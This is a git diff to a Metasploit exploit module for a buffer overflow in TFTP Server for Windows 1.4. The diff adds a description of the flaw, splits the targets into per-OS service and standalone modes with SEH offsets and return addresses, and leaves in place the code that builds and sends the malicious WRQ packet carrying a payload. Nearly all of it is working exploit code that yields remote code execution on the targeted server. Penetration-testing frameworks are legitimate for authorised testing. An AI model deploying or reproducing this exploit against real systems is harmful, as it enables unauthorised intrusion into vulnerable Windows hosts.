diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb b/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb index 2f27976bbe..6b75797544 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb @@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow', 'Description' => %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni - muts..at..offensive-security.com SEH Exploit + muts..at..offensive-security.com + The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request. + The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, + and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null, + which allows the corrupted data to be used in a strcmp() function, causing an access violation. + + Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine + launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly. + A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service. ported to metasploit by Datacut}, 'Author' => @@ -40,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '43785' ], - ['BID', '18345' ], + [ 'BID', '18345' ], [ 'URL', 'http://www.exploit-db.com/exploits/5314/' ], @@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista - [ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe - [ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe - [ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe + [ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe + [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe + [ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe + [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe + [ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe + [ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe ], 'Privileged' => false, 'DisclosureDate'=> 'Mar 26 2008', - 'DefaultTarget' => 2)) + 'DefaultTarget' => 5)) register_options( @@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V') mode = "netascii" - sploit = "\x00\x02" + evil + "\0" + mode +"\0" + sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02") udp_sock.put(sploit)